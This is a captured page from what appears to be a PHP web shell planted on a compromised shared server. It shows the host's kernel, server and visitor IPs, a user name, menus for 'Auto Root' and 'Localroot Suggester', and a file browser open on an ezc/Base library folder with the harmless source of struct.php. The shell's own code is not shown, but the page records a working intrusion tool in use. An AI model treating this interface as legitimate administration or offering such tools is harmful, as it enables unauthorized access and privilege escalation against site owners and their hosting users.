Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php55 /
usr /
share /
pear /
ezc /
Base /
Delete
Unzip
Name
Size
Permission
Date
Action
exceptions
[ DIR ]
drwxr-xr-x
2026-09-04 10:14
interfaces
[ DIR ]
drwxr-xr-x
2026-09-04 10:14
metadata
[ DIR ]
drwxr-xr-x
2026-09-04 10:14
options
[ DIR ]
drwxr-xr-x
2026-09-04 10:14
structs
[ DIR ]
drwxr-xr-x
2026-09-04 10:14
base.php
21.7
KB
-rw-r--r--
2024-07-17 10:18
base_autoload.php
3.08
KB
-rw-r--r--
2024-07-17 10:18
ezc_bootstrap.php
1.12
KB
-rw-r--r--
2024-07-17 10:18
features.php
10.9
KB
-rw-r--r--
2024-07-17 10:18
file.php
17.33
KB
-rw-r--r--
2024-07-17 10:18
init.php
4.07
KB
-rw-r--r--
2024-07-17 10:18
metadata.php
3.43
KB
-rw-r--r--
2024-07-17 10:18
options.php
5.23
KB
-rw-r--r--
2024-07-17 10:18
struct.php
820
B
-rw-r--r--
2024-07-17 10:18
Save
Rename
<?php /** * File containing the ezcBaseStruct. * * @package Base * @version 1.8 * @copyright Copyright (C) 2005-2009 eZ Systems AS. All rights reserved. * @license http://ez.no/licenses/new_bsd New BSD License */ /** * Base class for all struct classes. * * @package Base * @version 1.8 */ class ezcBaseStruct { /** * Throws a BasePropertyNotFound exception. * * @param string $name * @param mixed $value * @ignore */ final public function __set( $name, $value ) { throw new ezcBasePropertyNotFoundException( $name ); } /** * Throws a BasePropertyNotFound exception. * * @param string $name * @ignore */ final public function __get( $name ) { throw new ezcBasePropertyNotFoundException( $name ); } } ?>